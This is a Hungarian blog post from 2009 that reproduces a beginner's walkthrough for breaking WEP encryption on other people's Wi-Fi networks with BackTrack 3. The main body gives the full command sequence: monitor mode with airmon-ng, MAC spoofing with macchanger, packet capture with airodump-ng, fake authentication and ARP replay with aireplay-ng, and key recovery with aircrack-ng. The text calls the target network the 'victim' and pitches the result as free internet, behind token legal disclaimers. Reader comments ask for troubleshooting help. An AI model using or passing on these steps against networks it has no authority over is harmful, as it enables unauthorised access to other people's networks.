HTML

Ogre blogja

Ogre agymenései.

Friss topikok

  • blog43: Sziasztok. Ezt a blogot még 5-6 éves technikákra alapoztam. Azóta több, sokkal egyszerűbb WEP töré... (2013.01.02. 20:51) Wifi /WEP/ crack leírás

Wifi /WEP/ crack leírás

2009.07.01. 09:37 blog43

Csak mert sehol egy normális leírás nincs a wifi crack-ről. Alant Szeles Csaba, Tsabi mester írásai olvashatóak, aki ezt az egészet megírta. Köszönet neki ezúton is, mivel a neten mindenki reklámozza, hogy így wifi törés, úgy wifi crack, de konkrét eljárást senki se tud. Respekt továbbá a Kentagonnak http://www.tar.hu/kentagon/

A cikk:

"Tehát az első MAGYAR teljes leírást adó cikket a WEP kód feltörésének megírására rászántam magam...Szal nagyon szépen kérlek ne terjesztgesd úgy tovább mintha Te írtad volna, ha már ennyit segítek önzetlenül feláldoztam egy pénteki estémet akkor kérlek szépen hadd fusson tovább a nevemmel...kösz!


Én soha nem törtem fel és nem is próbálkoztam a feltöréssel, csupán a saját megosztásod védelmében írtam, hogy lásd milyen egyszerű ez egyeseknek. Semmilyen jogszabályt nem kívántam megsérteni, ha valakit megbántottam valamivel attól elnézést kérek!

Ezzel semmi jogot nem akarok megsérteni, aki ezt használja az bűncselekményt követ el .. szal csak olvasgass :)

 

Nos azzal azért tisztába kell lenni, hogy milyen dolgok szükségeltetnek:

-egy Wifi ami, az usb csatizás a fontos hogy vezetéken tudd a helyét változtatni (speckó szavakkal delokalizált). Ez még anno 8000 HUFba fájt nekem. Közbe még eszembe jutnak dolgok azokat ide leírom pl., hogy tök mindegy h milyen wifid van mert már mindegyiket támogatja (hogy mi? olvasd tovább) csak én mutatom be.

-Ha megvan a wifink akkor vegyél hozzá egy 3 méteres kábelt, lehetőleg usb2-es csatizóval, 3 méternél ne nagyobbat mert különben ledobálja a wifit és gyengébb lesz a net.

-Másik megoldás, hogy ha alaplapi vagy PCIos karid van, akkor az antennát mozgatod. Kaphatók külső antennák, amikkel rendesen meg lehet nővelni a vételi jelszintet.
-Ha ez is meg van és pengén elfut a gépünkön driverrel és kisikonostól akkor már csak egy adag szerencse és persze egy kis fortélyosság kell, keressünk olyan megosztott helyeket a Network alfülön, amelyek WEP kóddal van biztosítva, ezt úgy tehetjük meg ha kétszer rákattintunk egy kidobott névre, nah ennyire részletes a további részekben nem leszek mert akkor egy regényt is írhatnék. Még annyit hogy próbáld úgy változtatni a wifi antennád helyét és úgy beirányítani ahogy a legnagyobb erőséget fogod. Akár a tetőre is felszerelheted, ha beszerzel 1 külső antennát. Így akár több km-re is elszólhatsz.

- a következő ami a legfontosabb és enélkül el se kezd az a net hozzáférése egy néhány órára, mivel lekell szedned a Backtrack3-mat. Sajna nincs mese, szal irány a könyvtár vagy 200 forint kb. a netcaféban. Erre dobok egy címet, de inkább guglizd ki kb 271.000 találat van. 
azért itt egy cím: http://linux.softpedia.com/get/System/Operating-Systems/Linux-Distributions/BackTrack-9477.shtml

Persze minden tiszteletünk a Linuxnak és a Backtrack megíróinak is, mi lenne velünk nélkülük. Még mielőtt bárki is azt gondolná hogy utálom a winfost mint a szart, nos az jól is hiszi, de most ezt nem részletezném...

Tehát ha megvan nekünk a BackTrack 3.0 akkor kezdjünk is hozzá. Mivel nem hiszem, hogy sokan minden nap telepítgetik a Linuxot akkor nem is merem aztmondani hogy Lökjétek fel a gépre. INKÁBB HASZNÁLJ VMware workstation-t.

Töltsd le az eredeti oldalról:
http://www.vmware.com/download/ws/
Szal ez egy olyan progi amivel virtuálisan is futtathatod a Linuxot. Remélem ezt már nem kell leírnom hogyan is. Nagyon egyszerű higgyétek el.

Tehát ha már az előkészület mind megvan, akkor már csak pár perc és lesz NETED :) Hát nem erről álmodik mindenki?

Nah tehát aki életében nem használt Linuxot akkor annak mondom:
Katt a baloldalt lévő kék Ikonra-->Internet-->Wireless Assistant
Ott meg is látjuk a kiszemelt "áldozatot" a neve az ESSID alatt van, próbáljuk a legnagyobb jelerőségűt, és jól jegyezd meg a nevét, remélhetőleg ne ilyen gyökérséget válassz, hogy CNAP01-2120 az nem jó, olyat próbálj aminek értelme van pl.: TPlink. néhányszor refreshelj hogy biztos Aktív e a jel...


És arra nagyon figyelj oda, hogy minden szóközt meghaggyál ahol van. Had szóljon!

Utánna a kék ikon melletti consolt nyisd meg. Innentől figyelj nagyon mert csak egyszer írom le xD. leírom hogy miket kell leírni minden írás után ENTERT nyomj:
airmon-ng


Kidob néhány adatot (lehetőleg próbálj papír cerkával dolgozni)

Szal kidob egy ilyet hogy interface chipset driver
Nekünk az Interface alatti kiírás kell, ezek változóak de én most az egyszerűség kedvéért "rausb0"-t fogok alkalmazni de EZ NEM AZ AMIT MINDEHOVA KELL a saját megkapott kódodat írd ugyanúgy ahogy én fogom a rausb0-t!!!
airmon-ng stop rausb0


ezután kiír egysmást, de most nincs kedvem leírni mi micsoda. menjünk tovább me kezd sötétedni.
ifconfig rausb0 down
macchanger --mac 00:11:22:33:44:55 rausb0
Ezután kiírja hogy 
Currenct Mac: a te MAC-ed ezt felejtsd el
Fake MAc:EZT KELL HASZNÁLNOD!!!! Tehát mindenhova ahova azt írtam, hogy ide a te MACed az ez lesz hogy 00:11:22:33:44:55 
airmon-ng start rausb0


Ha megnézzük akkor az airmon-ng stop parancsnál lévő Driver alatt a zárójelbe az van írva, hogy (monitor mode disabled)
De ha lenézünk a mostani parancs alá a Driver alá ez van írva zárójelbe hogy (Monitor mode enabled)
Remélem nektek is!!!
Ha nem akkor vamit nagyon el***tál!
airodump-ng rausb0


meg is jelenik egy 

BSSD PWR BEACONS #DATA #/S CH MB ENC CHIPER AUTH ESSID
fejlécű rész a consolba, és ha idetekintünk ott is lesz----------------------->a kiszemelt "áldozat"
Nah ezt a számlálót az életbe nem tudnád megálítani enterrel szal itt használj egy
Ctrl+C-t (Lenyomod a controlt amit nyomva is tartasz és rá versz egy c billentyűt)


És voálá újra megjelenik a bt -# ami után folytathatjuk az írást....
Tehát előbb megmutattam hol láthatod a gépnek a nevét, nos most a BSSD-re pillancs.
Látsz 12 karakterből álló számot betüt kettesével kettőspont van köztük. nah azt írd le és jól jegyezd meg.
pl.: 55:55:55:55:55:55--> ebbe pont nincs betű de csak az egyszerűségért, és figyelj arra hogy a betűk azok ha nagyok akkor te is úgy írd be!!!!
nah haladjunk tovább... már itt ülök egy ideje és elzsibbadt a seggem, de már nincs sok hátra.


A következő parancsot ne üsd be olvasd el az alatta lévő szöveget:
airodump-ng -c (channel) -w (file name) --bssid (bssid) rausb0 
Nah ezt elmagyarázom hogy mi micsoda... 

  tehát írd be ezt hogy 

  airodump-ng -c ez legyen meg, a -c után azt kell írni hogy mennyi channelös az "áldozat", azt ugyanott tudod megnézni ahhol a BSSD ESSID van, van egy olyan hogy CH ez a channel, alatta van egy szám, ez bármennyi lehet (pl.:6,11) nos akkor azt a számot írd be, most példának én a 6-ot fogom használni.
  airodump-ng -c 6
eddig megvan, utánna folytasd ezzel

  airodump-ng -c 6 -w code123 --bssid
tehát eddig megvan a code123 az a fájl lesz amit a merevlemezre ment le. az lesz a neve a fájlnak, a --bssid után pedig a már leírt vagy fent is látható BSSID fejléc alatt lévő betűket számokat ugyanúgy írd le. Én csak példát használok ami így néz ki, a végére meg már a megjegyzett és jól ismert interface alatt levő szavat írd be ami nekem példaként rausb0: tehát így néz ki kitöltve
airodump-ng -c 6 -w code123 --bssid 55:55:55:55:55:55 rausb0


Yeah

Eljutottunk a türelmi részéhez. Ha mindent jól csináltunk akkor láthatjuk, hogy "mozognak" a számok, ezekből a legfontosabb a #Data alatt lévő szám. Aminek szintúgy pörögnie kellene. Nah ez akkor elvan magának

Nyissunk egy új console ablakot amit a bal oldalt levő kék icon mellett találunk.
Ha ez megvan akkor megint leírom az általános képletet de te a saját adataidat használd, megint leírom hogy mi micsoda:
aireplay-ng -1 0 -a (bssid) -h ide a saját MAC-ed wlan0
aireplay-ng -1 0 -a eddig írd le a BSSID az tudod, hogy hol van, ezelőtt is leírtam nálam a példa az így néz ki:
aireplay-ng -1 0 -a 55:55:55:55:55:55 ide ne a sajátodat írd be hanem az áldozatét
aireplay-ng -1 0 -a 55:55:55:55:55:55 -h 00:11:22:33:44:55 ---> ide viszont már a Te MAC-ed a Fake MAC
tehát a végére az Interface alatti szót amit eddig is használtunk
aireplay-ng -1 0 -a 55:55:55:55:55:55 -h 00:11:22:33:44:55 rausb0


most pedig nézhetjük a #Data-t amíg elmegy vagy 5000-ig :O hát elég lassú, meg is öregedhetnénk, de akkor gyorsítsuk fel :)
A még nyitva maradt console ablakba lépjünk vissza, amelyikbe az előző parancsot írtuk, tehát ne oda ahol a számok mozognak.
aireplay-ng -3 -b (bssid) -h saját MAC rausb0
pl.: tehát az áldozat BSSID-jét beírod és a Saját Mac-ed és az interfacenél lévő eddig is használt nevet. Megint ismétlem h ezek csak példák...tehát valahogy így néz ki:

aireplay-ng -3 -b 55:55:55:55:55:55 -h 00:11:22:33:44:55 rausb0

jah most pörögnie kell a #Datának, de kell lennie az előző oldalon egy liter írásnak. Most már nem is tart olyan sokáig a #Data kivárása xD
körülbelül várjuk meg hogy biztosra menjünk a 100.000 db-ot, ha netán hamar csináljuk akkor ezt az utolsó műveletet ismételgessük.


Oks, nah nyissunk még egy console-t
aircrack-ng -b (bssid) (filename-01.cap) 
az áldozat BSSID je példa.:
aircrack-ng -b 55:55:55:55:55:55
a filename-01.cap az az amit mi code123 néven elmentettünk. a 64-es szám pedig hogy 64 bites a kód, HA NETÁN ÍGY NEM MENNE AKKOR A 64-ET VÁLTOZTASD ÁT 128-RA, de általában 64 bites a kód, tehát az egésznek kb így kell kinéznie.
aircrack-ng -n 64 -b 55:55:55:55:55:55 code123-01.cap
és ha minden vagányul ment akkor alulról a második sorban ott is a kódunk
KEY FOUND! [ xx:xx:xx:xx:xx ]
Na ha ezt jól leírod, de meglegyen ám, akkor most nyisd meg a wifi softját, katt kétszer arra akit kiszemeltél (a linuxbol már kiléphetsz ;)) és a kód 1 be HEX-en hagyod beírod kettőspontostúl eggyütt mindenestűl a kódot és egy fülnél a Noneról állítsd át SHARED-ra ez baromi fontos mert ha nem teszed akkor nem fog menni.
Utána ha connectelt akkor még várj kb. 2-3 percet és utána fog menni, de közbe refresheld a böngészőt.



Én soha nem törtem fel és nem is próbálkoztam a feltöréssel, csupán a saját megosztásod védelmében írtam hogy lásd milyen egyszerű ez egyeseknek. Semmilyen jogszabályt nem kívántam megsérteni, ha valakit megbántottam valamivel attól elnézést kérek!
Ha tetszett és szeretnél valamit hozzáfűzni akkor küldj egy levelet Kentagonnak és ő majd eljuttatja hozzám, ha valamiben segítség kell akkor ugyanígy járj el!

Külön köszönet tesómnak, és a LINUXNAK
Készítette: Szeles Csaba, Tsabi

Ellenőrizte, javította: KeNTaGo

Átnézte: balintx

"

 

7 komment

A bejegyzés trackback címe:

https://ogre43.blog.hu/api/trackback/id/tr821219491

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

pusztafi 2010.12.24. 18:03:39

Heló. Aki irta a kommentet légyszíves válaszoljon.Az lenne a problémám h Sztem nem érzékeli a kártyát mert mikor beírom: airmon-ng akkor csak ennyit dob ki:img560.imageshack.us/i/wifit.png/ . Leirom a kártya típusát:.imagerz.com/QFdDXF1WCl8 a laptom mindennel kompatibilis mert elég új. A többi lépés menne szerintem csak ha az első nincs meg akkor nemmegy majd a többi is. Némelyik lépésre is azt irja ki h not found, error az installálás közben. Biztos az érzékeléssel van gond vagy a beállítással. A jel is elég erős. Légyszíves segítsetek előre kössz.

Nonnee 2011.11.15. 12:26:14

hali, én írtam anno a cikket, csak a barátnőm indamail-jével írok :) nah szoval a problémád az hogy wmvare-ben csinálod, és az internetet nem szakítottad meg xp-den, nemtudom mennyire van értelme még ide írom, bár hátha van még akit érdekel a wifi crack... szóval, én ugy csinálnám a helyedbe h kiírnám a backtrack-et cd-re és ott csak szimplán elindítod, és ugy csinálod az 100%-os lenne, ha nem akkor csak tényleg szakítsd meg a netet xpééén. üdv, Tsabi. Ha nem menne akkor valahogy keress meg... :)

buszoz 2012.03.15. 22:03:58

Nekem is ugyanez a problámám. Nem ír ki semmiféle interface-t chipsetet se. Ugyan az a problémám ami a fneti hozzászólónak is. Windows 7em van, backtrack3-ba csinálnám és vmware-ban! Mi lehet a hiba? Segítsél légyszives! köszönöm!

Who111 2013.01.02. 20:46:37

Hát nem mondanám, hogy kacsa.
A leírás alapján sikerrel törtem meg a saját hálómat. Igaz, nem virtuális gépről, hanem USB-ről futtattam a backtrack-et.
Viszont nekem is csak a második laptopról sikerült, mert az első kártyája nem volt alkalmas monitor üzemmódra.
Windows alatt katasztrófa volt a dolog, de linux alól simán megy, mint kés a vajban, pedig nem vagyok nagy linux guru, de a leírás elég szájbarágós. :-)
Egyedül a második konzol megnyitása jelentett gondot először, mert nem nyitottam meg a grafikus képernyőt. Onnan már az is csak egerészés volt.

blog43 2013.01.02. 20:51:15

Sziasztok. Ezt a blogot még 5-6 éves technikákra alapoztam. Azóta több, sokkal egyszerűbb WEP törés kijött. De ne feledjük, hogy mki WPA-val titkosít manapság. Annyi a wepes háló, mint anno a free hotshpot volt. Lincsi alól több alternatíva is létezik wep tórésre. Brute nélküli WPA cracket is összeállíthatna már vki igazán.:)
süti beállítások módosítása